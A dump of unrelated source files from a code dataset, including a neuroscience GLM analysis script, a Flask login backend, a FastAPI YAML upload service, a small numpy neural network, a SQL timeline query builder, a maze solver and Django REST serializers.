Rsstat\n\n\nRsStat_PIC = make_RS(d_list3)\nRsStat_PAC = make_RS(d_list)\n\ngood_listR = Rscore[4,:] > 0.02\n\n\n# %% Calculating best_kernel\n\n\nbest_kernel = {}\n\n\"\"\"\nfor each rule (c_ind) we have a best_kernel matrix\neach matrix contains best time_bin (ind), best coefficient and normalized model_weights\nrow 1 : best ind\nrow 2 : best category [0 1 2 3 4 ] is [\"Uncategorized\", \"Action\", \"Correct\",\"Stimuli\"]\nrow 3 to 5 : normalized weights for action, correct and stimuli\n\nwhen adding contingency\nrow 3 to 6 : contingency, action, correct, stimuli\n\nwhen adding trial history, the last row is trial history, with best category going up to 5 \n\"\"\"\n\ngood_list2 = good_list\n\n\ndef get_best_kernel(b_ind, window, window2, Data, c_ind, ana_period,good_list):\n best_kernel[c_ind] = np.zeros((b_ind,np.size(good_list,0)))\n\n\n k = 0;\n for n in good_list2:\n n = int(n)\n mi, bs, coef,beta_weights,mean_score, var_score,score_pool = Model_analysis(n, window, window2, Data,c_ind,ana_period)\n norm_coef = np.abs(coef)\n # Y_mean = np.mean(Data[n,c_ind-1][\"Y\"])\n if bs > weight_thresh:\n best_kernel[c_ind][0,k] = int(mi)\n if np.max(np.abs(coef))>var_score[0,mi]:\n best_kernel[c_ind][1,k] = int(np.argmax(np.abs(coef)))+1\n for i in np.arange(np.size(coef)):\n best_kernel[c_ind][i+2,k] = norm_coef[i] \n \n\n \n else:\n best_kernel[c_ind][2:b_ind,k] = np.ones((1,b_ind-2))*-1 \n k = k+1\n \n return best_kernel\n\nweight_thresh = 2*1e-2\n\n\n# Here we define the time period for model analysis. 
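ana_period below is given in ms; Model_analysis converts it to half-window bin indices via ana_bin = ana_period/(window2/2). A small sanity check of that conversion — window2 = 500 ms is an assumed value for illustration only, not taken from this file:

import numpy as np

window2 = 500                      # assumed bin width in ms (set elsewhere)
ana_period = np.array([0, 6000])   # ms, as chosen below
ana_bin = ana_period / (window2 / 2)
print(ana_bin)                     # [ 0. 24.] -> half-overlapping bin indices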
\n# ana_period = np.array([2000, 4000]) # (Stimulus presentation period)\n# ana_period = np.array([1500, 2500])\n# ana_period = np.array([2500, 4500])\nana_period = np.array([0, 6000])\nfor c_ind in c_list:\n if c_ind == 0 or c_ind ==-3 or c_ind == -4 or c_ind == -2:\n b_ind = 9\n elif c_ind == -1:\n b_ind = 7\n else:\n b_ind = 5\n \n best_kernel = get_best_kernel(b_ind, window, window2, Data, c_ind, ana_period,good_list)\n \n \n# %% Normalized population average of task variable weights\n\nd_list = good_list > 179\n\nd_list3 = good_list <= 179\n\nc_ind = -2\n# good_list2 = good_list[d_list & good_listR]\n\n# cat_list = best_kernel[c_ind][0,:] != 0 # Only neurons that were categorized\n\n# good_list_sep = good_list[cat_list]\n# good_list_sep = good_list[d_list & good_listR]\ngood_list_sep = good_list[:]\n\n\nweight_thresh = 2*1e-2\n\n\nif c_ind == 0 or c_ind == -2:\n cmap3 = ['tab:purple','tab:blue','tab:red','tab:olive']\n ax_sz = len(cmap3)\n clabels = [\"lick\",\"Contingency\",\"stim\",\"reward\",\"history\"]\n lstyles = ['solid','solid','solid','solid','solid']\n \n\nscore = np.zeros((160,1))\nConvdata = {}\nnorm_score_all = {};\nnorm_score_all = np.zeros((np.size(good_list_sep),np.size(score,0)))\nfor b_ind in np.arange(ax_sz):\n Convdata[b_ind] = np.zeros((np.size(good_list_sep),np.size(score,0)))\n \nfor n in np.arange(np.size(good_list_sep,0)):\n # n = int(n)\n nn = int(good_list_sep[n])\n Model_coef = Data[nn, c_ind-1][\"coef\"]\n Model_score = Data[nn, c_ind-1][\"score\"]\n\n # Model_coef = np.abs(Model_coef)/(np.max(np.abs(Model_coef)) + 0.1) # soft normalization value for model_coef\n Model_coef = Model_coef/(np.max(np.abs(Model_coef)) + 0.2) # soft normalization value for model_coef\n# \n norm_score = np.mean(Model_score, 1)\n norm_score[norm_score < weight_thresh] = 0\n norm_score = ndimage.gaussian_filter(norm_score,1)\n # norm_score[norm_score > 0] = 1 \n # if np.max(norm_score)>0:\n # norm_score = norm_score/(np.max(norm_score)+weight_thresh)\n # else:\n # norm_score = 0 \n \n # if good_listR[n] == True:\n # conv = Model_coef*norm_score\n # else: \n # conv = Model_coef*0\n if np.mean(norm_score*norm_score*1e4) > weight_thresh*1e2:\n conv = Model_coef\n else:\n conv = Model_coef*0\n \n # norm_score_all[n,:] = norm_score.T\n for b_ind in np.arange(np.size(Model_coef, 0)):\n Convdata[b_ind][n, :] = conv[b_ind, :]\n\n\nx_axis = np.arange(1, prestim+t_period, window)\nfig, axes = plt.subplots(1,1,figsize = (10,8))\n\nfor f in range(ax_sz):\n error = np.std(Convdata[f],0)/np.sqrt(np.size(good_list_sep))\n y = ndimage.gaussian_filter(np.mean(Convdata[f],0),2)\n axes.plot(x_axis*1e-3-prestim*1e-3,y,c = cmap3[f],linestyle = lstyles[f])\n axes.fill_between(x_axis*1e-3-prestim*1e-3,y-error,y+error,facecolor = cmap3[f],alpha = 0.3)\n axes.set_ylim([-0.20,0.20])\n\n# axes[1].plot(x_axis*1e-3-prestim*1e-3,ndimage.gaussian_filter(np.mean(norm_score_all,0),2))\n\ne_lines = np.array([0, 500, 500+1000, 2500+1000])\ne_lines = e_lines+500\n\n# %% Calculating weights\n\nweight = {}\np = {}\np[-1] = np.arange(140,160)\np[-2] = p[-1]\n# p[-2] = np.arange(140,160)\n\n \nfor f in np.arange(ax_sz): \n weight[-1,f]= np.zeros((1,294))\n weight[-2,f] = np.zeros((1,294)) \n for c_ind in [-1,-2]:\n if c_ind == -1:\n for n in np.arange(95,294):\n weight[c_ind,f][0,n] = np.mean(Convdata[f][n,p[c_ind]])\n if c_ind == -2:\n for n in np.arange(95):\n weight[c_ind,f][0,n] = np.mean(Convdata[f][n,p[c_ind]])\n \n \n# fig, axes = plt.subplots(1,1,figsize = (10,8))\n# axes.scatter(weight[-1,2],-weight[-2,2])\n# 
axes.set_xlim([-0.5,0.5])\n# axes.set_ylim([-0.5,0.5])\n\n# %% \nweight = {}\nnbunits = {}\nfor f in np.arange(ax_sz): \n nbunits[-1,f] = np.zeros((1,7))\n nbunits[-2,f] = np.zeros((1,7))\n\nfor t in np.arange(7):\n p = np.arange(t*20,t*20+20)\n for f in np.arange(ax_sz): \n weight[-1,f]= np.zeros((1,294))\n weight[-2,f] = np.zeros((1,294))\n\n for c_ind in [-1,-2]:\n if c_ind == -1:\n for n in np.arange(95,294):\n weight[c_ind,f][0,n] = np.mean(Convdata[f][n,p])\n nbunits[c_ind,f][0,t] = np.sum((weight[c_ind,f] > 0.1))/200\n \n if c_ind == -2:\n for n in np.arange(95):\n weight[c_ind,f][0,n] = np.mean(Convdata[f][n,p])\n nbunits[c_ind,f][0,t] = np.sum((weight[c_ind,f] > 0.1))/94\n\n\n\nfig, axes = plt.subplots(4,1, figsize = (8,20))\nfor f in np.arange(ax_sz):\n axes[f].plot(np.arange(7), nbunits[-1,f].T, c = cmap[f], linestyle = \"solid\")\n axes[f].plot(np.arange(7), nbunits[-2,f].T, c = cmap[f], linestyle = \"dotted\")\n \n\n\n \n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n# %%\n\nf = 2\nlist2 = (weight[-1,f] > 0.1) #* (weight[-2,f] == 0)\nlist3 = (weight[-2,f] > 0.1)# * (weight[-1,f] == 0)\nprint(np.sum(list2))\nprint(np.sum(list3))\nlist4 = (weight[-1,f] > 0)*(-weight[-2,f] > 0)\n# result = stats.linregress(weight[-1,f][list4],-weight[-2,f][list4])\n\n# print(result.rvalue)\n\n# \nfig, axes = plt.subplots(1,1,figsize = (10,8))\n\n# f = 1\n# y1 = np.mean(np.concatenate((Convdata[f][list2[0,:],:], Convdata[f][list3[0,:],:])),0)\n# s1 = np.std(np.concatenate((Convdata[f][list2[0,:],:], Convdata[f][list3[0,:],:])),0)/np.sqrt(np.sum(list2)+np.sum(list3))\n\ny1 = np.mean(Convdata[f][list2[0,:],:],0)\ns1 = np.std(Convdata[f][list2[0,:],:],0)/np.sqrt(np.sum(list2))\ny2 = np.mean(Convdata[f][list3[0,:],:],0)\ns2 = np.std(Convdata[f][list3[0,:],:],0)/np.sqrt(np.sum(list3))\n\n# take history units\n\nd = Convdata[f][list3[0,:],:]\n\n# p1 = np.arange(90,110)\n# t1 = Convdata[-1,f][list2[0,:],:][:,p1]\n\n# t2 = Convdata[-2,f][list3[0,:],:][:,p1]\n# stats.ks_2samp(np.mean(t1,1),np.mean(t2,1))\n\ny1 = ndimage.gaussian_filter(y1,2)\ny2 = ndimage.gaussian_filter(y2,2)\n\ncmap = cmap3 = ['tab:purple','tab:blue','tab:red','tab:olive']\n\naxes.plot(x_axis*1e-3-prestim*1e-3,y1,c = cmap[f],linestyle = 'solid')\naxes.fill_between(x_axis*1e-3-prestim*1e-3,y1-s1,y1+s1,facecolor = cmap[f],alpha = 0.3)\n\n\naxes.plot(x_axis*1e-3-prestim*1e-3,y2,c = cmap[f],linestyle = 'dashed')\naxes.fill_between(x_axis*1e-3-prestim*1e-3,y2-s2,y2+s2,facecolor = cmap[f],alpha = 0.3)\n\n# axes.set_ylim([-0.05,0.65])","repo_name":"johnleeuk12/LeeLab-Python","sub_path":"GLM_PPC_EJ_v4.py","file_name":"GLM_PPC_EJ_v4.py","file_ext":"py","file_size_in_byte":33289,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"21211290491","text":"# 2 Feladat: Pénzfeldobás\n\nfrom selenium import webdriver\nimport time\n\nfrom selenium.webdriver.chrome.options import Options\nfrom webdriver_manager.chrome import ChromeDriverManager\n\noptions = Options()\noptions.headless = False\ndriver = webdriver.Chrome(executable_path=ChromeDriverManager().install(), options=options)\n\ndriver.get('https://black-moss-0a0440e03.azurestaticapps.net/tts4.html')\n\n# ------------------------------------------------------------------------------\n\n# felhasznált elemek definiálása:\nsub_button = driver.find_element_by_id('submit')\n\n# megszámoljuk, hogy 100 esetből hányszor lesz 'fej' az eredmény:\nnum_f = 0\nfor i in range(100):\n sub_button.click()\n time.sleep(0.1)\n result_car = 
driver.find_element_by_id('lastResult').text\n if result_car == 'fej':\n num_f += 1\n else:\n pass\n\nprint(num_f)\n\n\n# az eredmény értékelése:\ntry:\n assert num_f >= 30\n print('Eredmény OK!')\nexcept:\n print('Rossz eredmény, 30-nál kevesebb a \"fej\"!')\nfinally:\n time.sleep(2)\n driver.close()\n\n\n\n","repo_name":"leeltib/testauto-zarovizsga1","sub_path":"testproject/tts4.py","file_name":"tts4.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"hu","doc_type":"code","dataset":"github-code","pt":"18"} +{"seq_id":"2904920592","text":"from crypt import methods\nfrom config import *\nfrom model import *\n\n@app.route('/')\ndef home():\n return render_template('index.html')\n\n# Tentativa de um cadastro simples\n# teste da rota cadastro: curl -d '{\"email\": \"inseridoatravesdocurl\", \"nome\": \"test_user\", \"senha\": \"test_pass\", \"objetivo\": \"test_objective\"}' -X POST -H \"Content-Type:application/json\" http://localhost:5000/cadastro\n@app.route('/cadastro', methods=['GET', 'POST'])\ndef cadastro():\n if request.method == 'GET': # Se a requisição for GET\n return render_template('cadastro.html') # Retorna o Template do cadastro\n else: # Se não, ele executa o procedimento do cadastro\n # Recebe os dados do front-end atraves do Json\n resposta = jsonify({\"resultado\": \"ok\", \"detalhes\": \"ok\"})\n dados = request.get_json() #o (force=True) dispensa o Content-Type na requisição no js\n user = Usuario(email = dados['email'],nome = dados['nome'],senha = dados['senha'], objetivo = dados['objetivo'])\n user.senha = criptografar_sen(user.senha)\n try: # Tenta executar a operação de inserir o usuário no banco\n # Cria uma nova pessoa a partir dos dados\n db.session.add(user) # Adiciona a pessoa no banco\n db.session.commit() # Dá o commit no banco\n print(user)\n print('Usuário cadastrado!')\n resposta = jsonify({'Resultado': 'sucesso', 'Detalhes': 'ok'}) # Dá resposta caso o usuário for inserido\n # Caso a operação falhe\n except Exception as e: # Transforma o erro na letra 'e'\n # introduz o erro em uma variável que poderá ser exibida no front-end\n resposta = jsonify({'resultado':'erro', 'detalhes':str(e)})\n # Fora do try\n resposta.headers.add(\"Access-Control-Allow-Origin\",\"*\")\n return resposta\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login(): # Criar a função da rota\n # Se a requisição for GET \n if request.method == 'GET':\n # Retorna o template do login\n return render_template('login.html')\n # Se não for GET \n else:\n # Preparar uma resposta otimista\n resposta = jsonify({\"resultado\": \"ok\", \"detalhes\": \"ok\"})\n dados = request.get_json(force=True) # Pegar os dados do front e colocar na variavel dados\n email = dados['email'] # pega o email inserido no front em json\n senha = dados['senha'] # pega a senha inserida no front em json\n senha = senha.encode('utf-8') # Deixa a senha no padrão utf-8.\n login = verificar_senha(senha,email) \n # Faz uma consulta no banco para saber se tem outro email igual\n usuario_encontrado = Usuario.query.filter_by(email=email).first()\n # Se não encontrar emails parecidos\n if usuario_encontrado is not None and login == True:\n # criar a json web token (JWT) usando o email \n access_token = create_access_token(identity=email)\n # Retorna a (JWT) em json\n resposta = jsonify({\"resultado\":\"ok\", \"detalhes\":access_token, 'email':email})\n # Adiciona o cabeçalho de liberação de origem\n resposta.headers.add('Access-Control-Allow-Origin', '*')\n print('Login Realizado!')\n else:\n # Vai 
responder erro\n resposta = jsonify({\"resultado\": \"erro\", \"detalhes\": \"login e/ou senha inválido(s)\"}) \n\n # adicionar cabeçalho de liberação de origem\n resposta.headers.add(\"Access-Control-Allow-Origin\", \"*\")\n # Retorna resposta\n return resposta # responder!\n\n\n@app.route('/inserir_conteudo', methods = ['POST', 'GET'])\ndef inserir_conteudo():\n if request.method == 'GET':\n return render_template('inserir_conteudo.html')\n else:\n resposta = jsonify({\"resultado\":\"ok\", \"detalhes\": \"ok\"})\n dados = request.get_json(Force = True)\n conteudo = Conteudo(titulo = dados[\"titulo\"], materia = dados[\"materia\"], usuario =dados[\"usuario\"])\n\napp.run(debug=True, host=\"0.0.0.0\")","repo_name":"0Neocortexx/portalEstudantil","sub_path":"version_1.1/backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":4032,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"20892877884","text":"from fastapi import FastAPI, File, UploadFile\nfrom redis import Redis\nfrom pydantic import BaseModel\nimport yaml\nimport uvicorn\nimport logging\n\nlogger = logging.getLogger(__name__)\n\nasync def upload_file(file: UploadFile = File(...)):\n contents = await file.read()\n try:\n data = yaml.safe_load(contents)\n except yaml.YAMLError as e:\n logger.error(f\"Failed to parse YAML data: {e}\")\n return {\"status\": \"failure\", \"message\": \"Invalid file format. Please upload a YAML file.\"}\n person = Person(**data)\n logger.info(f\"Received new person record: {person}\")\n redis.set(person.first_name, person.json())\n return {\"status\": \"success\"}\n\napp = FastAPI()\n\nredis = Redis(host='localhost', port=6379, db=0)\nclass Person(BaseModel):\n first_name: str\n last_name: str\n age: int\n\n@app.post('/upload/')\nasync def upload_file(file: UploadFile = File(...)):\n contents = await file.read()\n data = yaml.safe_load(contents)\n person = Person(**data)\n logger.info(f\"Received new person record: {person}\")\n redis.set(person.first_name, person.json())\n return {'status': 'success'}\n\n@app.get('/person/{first_name}')\nasync def get_person(first_name: str):\n data = redis.get(first_name)\n if not data:\n return {'status': 'failure', 'message': 'Person not found'}\n person = Person.parse_raw(data)\n return person.dict()\n\nif __name__ == '__main__':\n uvicorn.run(app, host='0.0.0.0', port=8000)\n\n","repo_name":"Hemantht1007/hemanth-assessment","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"43825792387","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Nov 22 20:11:54 2019\n\n@author: Yatri Kalathia\n\"\"\"\n\n#SKLearn assignment Question 2\n\nimport pandas as pd\nfrom sklearn import datasets\nfrom sklearn.cluster import KMeans \nimport matplotlib.pyplot as plt\n\n#loading iris dataset\niris_dataset = datasets.load_iris()\n\n#converting to pandas dataframe\niris_data = pd.DataFrame(iris_dataset.data)\n\niris_features = iris_data.iloc[:, [0,1, 2, 3]].values\n\nno_of_clust = []\n\n#creating n number of CLusters\nfor i in range(1, 13):\n kmeans = KMeans(n_clusters = i, init = 'k-means++', max_iter = 300, n_init = 10, random_state = 0)\n kmeans.fit(iris_features)\n no_of_clust.append(kmeans.inertia_)\n \n \nfor item in range(len(no_of_clust)-1):\n print(abs(no_of_clust[item+1] - no_of_clust[item])) \n\n \n#Plotting the results onto a line graph to observe elbow 
heuristic\nplt.plot(range(1, 13), no_of_clust)\nplt.title('The elbow method')\nplt.xlabel('Number of clusters')\nplt.ylabel('Values within Cluster Sum of Squares') \nplt.show()\n\n\n","repo_name":"yatrik11/FE595_SKLearn_Assignment","sub_path":"SKLearn_Assignment_2.py","file_name":"SKLearn_Assignment_2.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"817593570","text":"#import code from last time\nfrom part5 import *\nfrom scipy import optimize\n\n\ndef computeGradientsCheck(N, X, y):\n paramsInitial = N.getParams()\n chkgrad = np.zeros(paramsInitial.shape)\n perturb = np.zeros(paramsInitial.shape)\n e = 1e-4\n\n for p in range(len(paramsInitial)):\n #Set perturbation vector\n perturb[p] = e\n N.setParams(paramsInitial + perturb)\n loss2 = N.costFunction(X, y)\n\n N.setParams(paramsInitial - perturb)\n loss1 = N.costFunction(X, y)\n\n #Compute Check Gradient\n chkgrad[p] = (loss2 - loss1) / (2*e)\n\n #Return the value we changed to zero:\n perturb[p] = 0\n\n #Return Params to original value:\n N.setParams(paramsInitial)\n\n return chkgrad\n\n#New complete class, with changes:\nclass NeuralNetwork(object):\n def __init__(self, Lambda=0): \n #Define Hyperparameters\n self.inputLayerSize = 2\n self.outputLayerSize = 1\n self.hiddenLayerSize = 3\n \n #Weights (parameters)\n self.W1 = np.random.randn(self.inputLayerSize,self.hiddenLayerSize)\n self.W2 = np.random.randn(self.hiddenLayerSize,self.outputLayerSize)\n \n #Regularization Parameter:\n self.Lambda = Lambda\n \n def forwardPropagation(self, X):\n #Propogate inputs though network\n self.z2 = np.dot(X, self.W1)\n self.a2 = self.sigmoid(self.z2)\n self.z3 = np.dot(self.a2, self.W2)\n yHat = self.sigmoid(self.z3) \n return yHat\n \n def sigmoid(self, z):\n #Apply sigmoid activation function to scalar, vector, or matrix\n return 1/(1+np.exp(-z))\n \n def sigmoidPrime(self,z):\n #Gradient of sigmoid\n return np.exp(-z)/((1+np.exp(-z))**2)\n \n def costFunction(self, X, y):\n #Compute cost for given X,y, use weights already stored in class.\n self.yHat = self.forwardPropagation(X)\n J = 0.5*sum((y-self.yHat)**2)/X.shape[0] + (self.Lambda/2)*(np.sum(self.W1**2)+np.sum(self.W2**2))\n return J\n \n def costFunctionPrime(self, X, y):\n #Compute derivative with respect to W and W2 for a given X and y:\n self.yHat = self.forwardPropagation(X)\n \n delta3 = np.multiply(-(y-self.yHat), self.sigmoidPrime(self.z3))\n #Add gradient of regularization term:\n dJdW2 = np.dot(self.a2.T, delta3)/X.shape[0] + self.Lambda*self.W2\n \n delta2 = np.dot(delta3, self.W2.T)*self.sigmoidPrime(self.z2)\n #Add gradient of regularization term:\n dJdW1 = np.dot(X.T, delta2)/X.shape[0] + self.Lambda*self.W1\n \n return dJdW1, dJdW2\n \n #Helper functions for interacting with other methods/classes\n def getParams(self):\n #Get W1 and W2 Rolled into vector:\n params = np.concatenate((self.W1.ravel(), self.W2.ravel()))\n return params\n \n def setParams(self, params):\n #Set W1 and W2 using single parameter vector:\n W1_start = 0\n W1_end = self.hiddenLayerSize*self.inputLayerSize\n self.W1 = np.reshape(params[W1_start:W1_end], \\\n (self.inputLayerSize, self.hiddenLayerSize))\n W2_end = W1_end + self.hiddenLayerSize*self.outputLayerSize\n self.W2 = np.reshape(params[W1_end:W2_end], \\\n (self.hiddenLayerSize, self.outputLayerSize))\n \n def computeGradients(self, X, y):\n dJdW1, dJdW2 = self.costFunctionPrime(X, y)\n return np.concatenate((dJdW1.ravel(), 
dJdW2.ravel()))\n\n\nclass trainer(object):\n def __init__(self, N):\n #Make Local reference to network:\n self.N = N\n \n def callbackF(self, params):\n self.N.setParams(params)\n self.J.append(self.N.costFunction(self.X, self.y))\n self.testJ.append(self.N.costFunction(self.testX, self.testY))\n \n def costFunctionWrapper(self, params, X, y):\n self.N.setParams(params)\n cost = self.N.costFunction(X, y)\n grad = self.N.computeGradients(X,y) \n return cost, grad\n \n def train(self, trainX, trainY, testX, testY):\n #Make an internal variable for the callback function:\n self.X = trainX\n self.y = trainY \n self.testX = testX\n self.testY = testY\n\n #Make empty list to store training costs:\n self.J = []\n self.testJ = []\n \n params0 = self.N.getParams()\n\n options = {'maxiter': 200, 'disp' : True}\n _res = optimize.minimize(self.costFunctionWrapper, params0, \\\n jac=True, method='BFGS', \\\n args=(trainX, trainY), options=options, \\\n callback=self.callbackF)\n\n self.N.setParams(_res.x)\n self.optimizationResults = _res\n\n\ndef computeGradientsCheck(N, X, y):\n paramsInitial = N.getParams()\n chkgrad = np.zeros(paramsInitial.shape)\n perturb = np.zeros(paramsInitial.shape)\n e = 1e-4\n\n for p in range(len(paramsInitial)):\n #Set perturbation vector\n perturb[p] = e\n N.setParams(paramsInitial + perturb)\n loss2 = N.costFunction(X, y)\n\n N.setParams(paramsInitial - perturb)\n loss1 = N.costFunction(X, y)\n\n #Compute Check Gradient\n chkgrad[p] = (loss2 - loss1) / (2*e)\n\n #Return the value we changed to zero:\n perturb[p] = 0\n\n #Return Params to original value:\n N.setParams(paramsInitial)\n\n return chkgrad\n\n","repo_name":"Einsteinish/Artificial-Neural-Networks-with-Jupyter","sub_path":"part7.py","file_name":"part7.py","file_ext":"py","file_size_in_byte":5635,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"18"} +{"seq_id":"70823442279","text":"from dataclasses import dataclass\nfrom datetime import date, datetime\nfrom app import database\nfrom app.transactions.filter import TransactionFilter\nfrom app.transactions.transaction_model import Query\n\n\n@dataclass\nclass TimelineMonth:\n amount: int\n month_start_date: date\n l1: str = None\n l2: str = None\n l3: str = None\n\n def __eq__(self, other: \"TimelineMonth\") -> bool:\n return (\n self.amount == other.amount\n and self.month_start_date == other.month_start_date\n and self.l1 == other.l1\n and self.l2 == other.l2\n and self.l3 == other.l3\n )\n\n\ndef get_transaction_timeline(\n filter: TransactionFilter, group_by_tag: bool = True\n) -> list[TimelineMonth]:\n qb = (\n Query(alias=\"t.\")\n .by_account(filter.account)\n .amount_from(filter.min_value)\n .amount_to(filter.max_value)\n .by_tag_filter(filter.tags)\n )\n conditions = qb.build_conditions(query=\"\", include_where=False)\n\n date_qb = Query(alias=\"dt.\").date_from(filter.date_from).date_to(filter.date_to)\n date_conditions = date_qb.build()\n\n tag_qb = Query(alias=\"tr.\").by_tag_filter(filter.tags)\n tag_conditions = tag_qb.build()\n print(tag_conditions, tag_qb.get_inputs())\n\n include_l1 = group_by_tag and len(filter.tags.l1 or [])\n include_l2 = group_by_tag and len(filter.tags.l2 or [])\n include_l3 = group_by_tag and len(filter.tags.l3 or [])\n\n # If there is no filtering, group by l1\n if not include_l1 and not include_l2 and not include_l3:\n include_l1 = True\n\n l1_column = \", tags.l1\" if include_l1 else \"\"\n l2_column = \", tags.l2\" if include_l2 else \"\"\n l3_column = \", tags.l3\" if 
include_l3 else \"\"\n\n tag_columns = []\n if include_l1:\n tag_columns.append(\"tr.l1\")\n if include_l2:\n tag_columns.append(\"tr.l2\")\n if include_l3:\n tag_columns.append(\"tr.l3\")\n\n tag_join_conditions = []\n if include_l1:\n tag_join_conditions.append(\"t.l1 = tags.l1\")\n if include_l2:\n tag_join_conditions.append(\"t.l2 = tags.l2\")\n if include_l3:\n tag_join_conditions.append(\"t.l3 = tags.l3\")\n tag_join_conditions.append(\"strftime('%Y-%m', t.date, 'unixepoch') = months.month\")\n\n group_by = f\"{l1_column} {l2_column} {l3_column}\" if group_by_tag else \"\"\n\n query = f\"\"\"SELECT \n SUM(COALESCE(t.amount, 0)) as total, \n months.month\n {l1_column}\n {l2_column}\n {l3_column}\n FROM \n (SELECT DISTINCT {\", \".join(tag_columns)} FROM transactions tr {tag_conditions}) as tags,\n (SELECT DISTINCT strftime('%Y-%m', dt.date, 'unixepoch') month from transactions dt {date_conditions}) as months\n LEFT JOIN Transactions t \n {\"ON \" + \" AND \".join(tag_join_conditions)}\n {conditions}\n GROUP BY \n months.month\n {group_by}\n ORDER BY \n months.month\n {group_by}\"\"\"\n\n print(query)\n\n inputs = [*date_qb.get_inputs(), *qb.get_inputs(), *tag_qb.get_inputs()]\n\n amounts = database.select(query, inputs)\n\n date_format = \"%Y-%m\"\n\n return [\n TimelineMonth(\n amount=row.total,\n month_start_date=datetime.strptime(row[1], date_format).date(),\n l1=row.l1 if include_l1 else None,\n l2=row.l2 if include_l2 else None,\n l3=row.l3 if include_l3 else None,\n )\n for row in amounts\n ]\n","repo_name":"TheIthorian/Transactions","sub_path":"src/app/transactions/timeline.py","file_name":"timeline.py","file_ext":"py","file_size_in_byte":3486,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"74939811559","text":"from collections import deque\n\ndef solution(maps):\n rows = len(maps)\n cols = len(maps[0])\n \n # 방향 설정 (상, 하, 좌, 우)\n directions = [(-1, 0), (1, 0), (0, -1), (0, 1)]\n \n # 시작 지점, 출구, 레버 위치 찾기\n start = None\n end = None\n lever = None\n for i in range(rows):\n for j in range(cols):\n if maps[i][j] == 'S':\n start = (i, j)\n elif maps[i][j] == 'E':\n end = (i, j)\n elif maps[i][j] == 'L':\n lever = (i, j)\n \n # BFS 탐색 시작\n queue = deque([(start[0], start[1], 0)]) # (행, 열, 현재까지 걸린 시간)\n visited = set([(start[0], start[1])])\n \n while queue:\n row, col, time = queue.popleft()\n \n if (row, col) == (end[0], end[1]):\n return time\n \n for dr, dc in directions:\n new_row, new_col = row + dr, col + dc # 사방으로 한 칸씩 진행\n \n if 0 <= new_row < rows and 0 <= new_col < cols and (new_row, new_col) not in visited:\n if maps[new_row][new_col] != 'X':\n queue.append((new_row, new_col, time + 1))\n visited.add((new_row, new_col))\n \n # 레버를 만난 경우\n if (new_row, new_col) == lever:\n queue.append((new_row, new_col, time + 2)) # 레버를 당기는 시간 추가\n \n # 탈출할 수 없는 경우\n return -1\nmaps = [\n \"SOOOOXXOOOOX\",\n \"XOXXOOXOOXXX\",\n \"OOOOOXOOOOOX\",\n \"OXXXXXOOXXXX\",\n \"OOOOOOOOOOOE\"\n]\nsolution(maps)","repo_name":"haseungyeon/study","sub_path":"python/algorithm/4th_week/escape_maze.py","file_name":"escape_maze.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"13461029347","text":"\nCARD_WIDTH = 95\nCARD_HEIGHT = 120\n\nNUM_CARDS_WITH_PLAYER = 13\nCOMPUTER_DELAY = 3\n\n\nDISPLAY_HEIGHT = 700\nDISPLAY_WIDTH = 1500\n\nBUTTON_WIDTH = 150\nBUTTON_HEIGHT = 50\n\nBORDER_GAP = 20\nCARD_GAP = 105\n\nFONT_COLOR = 
(255,255,255)\nFONT_SIZE = 20\n\nINITIAL_PLAYER_POINTS = 90\nINITIAL_COMPUTER_POINTS = 90\n\n\n# Pre-process Display values\nMID_CARD_POS = (2 * BORDER_GAP + FONT_SIZE + CARD_HEIGHT) + (DISPLAY_HEIGHT - CARD_HEIGHT - BORDER_GAP - \\\n(2 * BORDER_GAP + FONT_SIZE + CARD_HEIGHT))/2 - CARD_HEIGHT/2 - FONT_SIZE/2\n\nBUTTON_VERTICAL_HEIGHT = 250\n\nMUSIC_NAME = \"music/Rival - Throne - (ft. Neoni).mp3\"\n\"\"\"\nMusic Credits:\nTrack: Rival - Throne - (ft. Neoni) [NCS Release]\nMusic provided by NoCopyrightSounds.\nWatch: https://www.youtube.com/watch?v=midpbHJ4EIk\nFree Download / Stream: http://ncs.io/Throne\n\"\"\"","repo_name":"Manas2030/InSpades","sub_path":"game_constants.py","file_name":"game_constants.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"1984539871","text":"from .models import Todo, Tag\r\nfrom django.contrib.auth.models import User\r\nfrom rest_framework import serializers\r\n\r\nclass TodoSerializer(serializers.HyperlinkedModelSerializer):\r\n owner = serializers.ReadOnlyField(source='owner.username')\r\n \r\n class Meta:\r\n model = Todo\r\n fields = ['url', 'id', 'todo_title', 'tags', 'text', 'owner']\r\n extra_kwargs = {\r\n 'url': {'view_name': 'todo:todo-detail'},\r\n 'tags': {'view_name': 'todo:tag-detail'},\r\n }\r\n\r\nclass TagSerializer(serializers.HyperlinkedModelSerializer):\r\n class Meta:\r\n model = Tag\r\n fields = ['url', 'id', 'tag_title', 'todo_set']\r\n extra_kwargs = {\r\n 'url': {'view_name': 'todo:tag-detail'},\r\n 'todo_set': {'view_name': 'todo:todo-detail'},\r\n }\r\n\r\nclass UserSerializer(serializers.HyperlinkedModelSerializer):\r\n todo_set = serializers.HyperlinkedRelatedField(many=True, view_name='todo:todo-detail', read_only=True)\r\n\r\n class Meta:\r\n model = User\r\n fields = ['url', 'id', 'username', 'todo_set']\r\n extra_kwargs = {\r\n 'url': {'view_name': 'todo:user-detail'},\r\n 